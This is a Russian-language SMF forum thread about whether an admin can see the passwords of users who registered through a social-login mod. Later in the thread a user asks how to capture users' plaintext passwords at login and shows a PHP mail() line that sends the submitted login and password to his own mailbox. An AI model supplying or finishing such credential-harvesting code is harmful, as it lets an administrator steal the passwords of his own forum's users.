Можно ли узнать пароль

Автор Alex32, 02 марта 2015, 17:29:59

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Alex32

Стоял мод чтобы пользователи через соц сети могли войти, может ли глобал модератор посмотреть пароль где нибудь в базе данных, если есть доступ, пользователя который через соц сети регистрировался

digger®

Цитата: Alex32 от 02 марта 2015, 17:29:59
Стоял мод чтобы пользователи через соц сети могли войти, может ли глобал модератор посмотреть пароль где нибудь в базе данных, если есть доступ, пользователя который через соц сети регистрировался
Им случайный пароль генерируется и посмотреть его нельзя.

GeorG

Цитата: Alex32 от 02 марта 2015, 17:29:59
Стоял мод чтобы пользователи через соц сети могли войти, может ли глобал модератор посмотреть пароль где нибудь в базе данных, если есть доступ, пользователя который через соц сети регистрировался
Я так понимаю стоял мод, а потом был удалён и теперь пользователь не может зайти?
Если всё так, то пользователь больше не зайдет, потому как там не только пароль генерируется, а ещё и почта случайная. Т.е., он даже не сможет создать новый пароль. В этом случае ему или изменить почту на его и выслать ему (ну например по аське), чтобы он восстановил пароль, или в профиле вписать новый, или пускай регистрируется по новой и после этого, присвоить ему сообщение того пользователя, который был создан с помощью мода регистрации через социальные сети.
Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

shked

#3
подскажите как перехватить при входе пароль пользователя в не зашифрованном виде.
как я понял данные с формы входа обрабатывает файл LogInOut.php
пробовал сначала вставить
mail("моя_почта@mail.ru", $_POST['user'], $_POST['passwrd']);
приходит логин но без пароля.
может в Login.template.php изменить?
злой админ

Snow_Irbis

Цитата: shked от 05 января 2016, 01:47:35подскажите как перехватить при входе пароль пользователя в не зашифрованном виде.

А зачем это делать?